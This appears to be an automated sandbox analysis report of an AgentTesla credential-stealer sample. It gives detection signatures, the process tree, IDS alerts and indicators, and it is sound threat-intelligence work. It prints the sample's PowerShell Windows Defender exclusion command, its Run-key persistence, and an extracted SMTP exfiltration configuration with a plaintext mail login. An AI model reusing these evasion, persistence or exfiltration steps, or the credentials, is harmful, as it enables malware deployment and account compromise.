
Windows Analysis Report
Eschemyquote24573j33.exe

Overview

General Information

Sample name: Eschemyquote24573j33.exe
Analysis ID: 1519249
MD5: bdd152d62cf8fa852e08c46505629663
SHA1: b1a0fd6a26c5bf9ba02c12afcdc89eeb8528040e
SHA256: a2cdc2f4fcad4c6b982674a1b3b86a0f7bcdb7c8f18c1183799d70777c726859
Tags: exe, user-lowmal3

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Eschemyquote24573j33.exe (PID: 4332 cmdline: "C:\Users\user\Desktop\Eschemyquote24573j33.exe" MD5: BDD152D62CF8FA852E08C46505629663)
    • powershell.exe (PID: 6616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6488 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • Eschemyquote24573j33.exe (PID: 7140 cmdline: "C:\Users\user\Desktop\Eschemyquote24573j33.exe" MD5: BDD152D62CF8FA852E08C46505629663)
  • ctsdvwT.exe (PID: 7104 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: BDD152D62CF8FA852E08C46505629663)
    • ctsdvwT.exe (PID: 320 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: BDD152D62CF8FA852E08C46505629663)
  • ctsdvwT.exe (PID: 2892 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: BDD152D62CF8FA852E08C46505629663)
    • ctsdvwT.exe (PID: 7056 cmdline: "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe" MD5: BDD152D62CF8FA852E08C46505629663)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.musabody.com", "Username": "victoria@musabody.com", "Password": "MUSAbody_victoria2018"}
Source | Rule | Description | Author | Strings
0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
8.2.ctsdvwT.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
8.2.ctsdvwT.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
8.2.ctsdvwT.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x336c8:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3373a:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x337c4:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33856:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x338c0:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x33932:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x339c8:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x33a58:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
10.2.ctsdvwT.exe.3f0d1a8.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
10.2.ctsdvwT.exe.3f0d1a8.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

                    System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Eschemyquote24573j33.exe", ParentImage: C:\Users\user\Desktop\Eschemyquote24573j33.exe, ParentProcessId: 4332, ParentProcessName: Eschemyquote24573j33.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", ProcessId: 6616, ProcessName: powershell.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Eschemyquote24573j33.exe, ProcessId: 7140, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctsdvwT
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Eschemyquote24573j33.exe", ParentImage: C:\Users\user\Desktop\Eschemyquote24573j33.exe, ParentProcessId: 4332, ParentProcessName: Eschemyquote24573j33.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", ProcessId: 6616, ProcessName: powershell.exe
Source: Network Connection | Author: frack113 | Data: DestinationIp: 108.167.140.123, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Eschemyquote24573j33.exe, Initiated: true, ProcessId: 7140, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49716
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Eschemyquote24573j33.exe", ParentImage: C:\Users\user\Desktop\Eschemyquote24573j33.exe, ParentProcessId: 4332, ParentProcessName: Eschemyquote24573j33.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe", ProcessId: 6616, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-26T09:06:54.339278+0200 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 108.167.140.123 | 587 | TCP
2024-09-26T09:08:24.118030+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 108.167.140.123 | 587 | TCP
2024-09-26T09:06:54.339278+0200 | 2839723 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49716 | 108.167.140.123 | 587 | TCP
2024-09-26T09:06:54.339278+0200 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 108.167.140.123 | 587 | TCP


                    AV Detection

Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.musabody.com", "Username": "victoria@musabody.com", "Password": "MUSAbody_victoria2018"}
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | ReversingLabs: Detection: 57%
Source: Eschemyquote24573j33.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Joe Sandbox ML: detected
Source: Eschemyquote24573j33.exe | Joe Sandbox ML: detected
Source: Eschemyquote24573j33.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Eschemyquote24573j33.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: BXgJ.pdb | source: Eschemyquote24573j33.exe, ctsdvwT.exe.4.dr
Source: Binary string: BXgJ.pdbSHA256+ | source: Eschemyquote24573j33.exe, ctsdvwT.exe.4.dr
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4x nop then jmp 06F8A50Bh | 0_2_06F89A6C
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 4x nop then jmp 0708A1DBh | 7_2_0708973C
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 4x nop then jmp 07A5A1E3h | 10_2_07A59744

                    Networking

Source: Network traffic | Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49716 -> 108.167.140.123:587
Source: Network traffic | Suricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.5:49716 -> 108.167.140.123:587
Source: Network traffic | Suricata IDS: 2839723 - Severity 1 - ETPRO MALWARE Win32/Agent Tesla SMTP Activity : 192.168.2.5:49716 -> 108.167.140.123:587
Source: Network traffic | Suricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.5:49716 -> 108.167.140.123:587
Source: global traffic | TCP traffic: 192.168.2.5:49716 -> 108.167.140.123:587
Source: Joe Sandbox View | IP Address: 108.167.140.123
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: global traffic | TCP traffic: 192.168.2.5:49716 -> 108.167.140.123:587
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: mail.musabody.com
Source: Eschemyquote24573j33.exe, 00000004.00000002.4509927352.0000000003389000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.musabody.com
Source: Eschemyquote24573j33.exe, 00000000.00000002.2068800637.0000000002966000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000007.00000002.2195768710.0000000002CFF000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2276352451.0000000002EA9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Eschemyquote24573j33.exe, 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, ctsdvwT.exe, 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, POq2Ux.cs | .Net Code: _4H57oeN1J
Source: 0.2.Eschemyquote24573j33.exe.39cb710.3.raw.unpack, POq2Ux.cs | .Net Code: _4H57oeN1J
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_0693EE20 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0693FC90,00000000,00000000 | 4_2_0693EE20
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\Eschemyquote24573j33.exe
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Window created: window name: CLIPBRDWNDCLASS
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Window created: window name: CLIPBRDWNDCLASS

                    System Summary

Source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.ctsdvwT.exe.3f0d1a8.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.ctsdvwT.exe.4071760.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.ctsdvwT.exe.4071760.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Eschemyquote24573j33.exe.39cb710.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 10.2.ctsdvwT.exe.3f0d1a8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Eschemyquote24573j33.exe.39cb710.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_0275DEEC
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_06F81DB8
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_06F86CB0
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_06F81DA8
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_06F84D30
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_06F8C2A8
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_06F848F8
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_06F848F8
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_06F848E0
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_06F871C0
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 0_2_06F85168
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_032B9758
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_032B4AA8
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_032BC9D8
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_032B8F90
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_032B3E90
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_032B41D8
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_06936C74
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_06932D98
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_06930848
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_069326B0
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_06938C96
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_06936C68
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_06937FA6
Source: C:\Users\user\Desktop\Eschemyquote24573j33.exe | Code function: 4_2_06937FA8
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 7_2_012CDEEC
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 7_2_07081DB8
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 7_2_0708BF80
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 7_2_07084D30
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 7_2_07081D79
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 7_2_07086CB0
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 7_2_07085168
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 7_2_070871C0
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 7_2_070848E0
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 7_2_070848F8
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_01879638
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_0187C980
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_01874AA8
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_01873E90
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_018741D8
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_06860448
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_068611F0
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_06866C6C
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_06862D98
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_068622B0
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_06867F81
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_06867FA8
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_06868C97
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_0187CC68
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 10_2_013DDEEC
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 10_2_07A51DB8
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 10_2_07A5BF80
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 10_2_07A51DA8
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 10_2_07A54D30
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 10_2_07A51D79
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 10_2_07A56CB0
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 10_2_07A571C0
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 10_2_07A55168
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 10_2_07A548F8
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 11_2_01819638
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 11_2_0181C980
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 11_2_01814AA8
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 11_2_01813E90
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 11_2_018141D8
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 11_2_0181CC68
Source: Eschemyquote24573j33.exe, 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename24eacbb4-825a-4768-ad59-21c6c6ffb60d.exe4 vs Eschemyquote24573j33.exe
Source: Eschemyquote24573j33.exe, 00000000.00000002.2069428436.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Eschemyquote24573j33.exe
Source: Eschemyquote24573j33.exe, 00000000.00000002.2068800637.00000000029B5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename24eacbb4-825a-4768-ad59-21c6c6ffb60d.exe4 vs Eschemyquote24573j33.exe
Source: Eschemyquote24573j33.exe, 00000000.00000000.2032928595.0000000000536000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBXgJ.exe> vs Eschemyquote24573j33.exe
Source: Eschemyquote24573j33.exe, 00000000.00000002.2066084246.000000000093E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Eschemyquote24573j33.exe
Source: Eschemyquote24573j33.exe, 00000000.00000002.2072001901.0000000007280000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Eschemyquote24573j33.exe
Source: Eschemyquote24573j33.exe, 00000004.00000002.4505813523.00000000011D9000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Eschemyquote24573j33.exe
Source: Eschemyquote24573j33.exe | Binary or memory string: OriginalFilenameBXgJ.exe> vs Eschemyquote24573j33.exe
                    Source: Eschemyquote24573j33.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 8.2.ctsdvwT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.3f0d1a8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.4071760.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.4071760.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Eschemyquote24573j33.exe.39cb710.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 10.2.ctsdvwT.exe.3f0d1a8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Eschemyquote24573j33.exe.39cb710.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: Eschemyquote24573j33.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, ZTFEpdjP8zw.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, WnRNxU.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, 2njIk.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, I5ElxL.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, QQSiOsa4hPS.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.Eschemyquote24573j33.exe.3990af0.4.raw.unpack, FdHU4eb83Z7.cs | Cryptographic APIs: 'TransformFinalBlock'
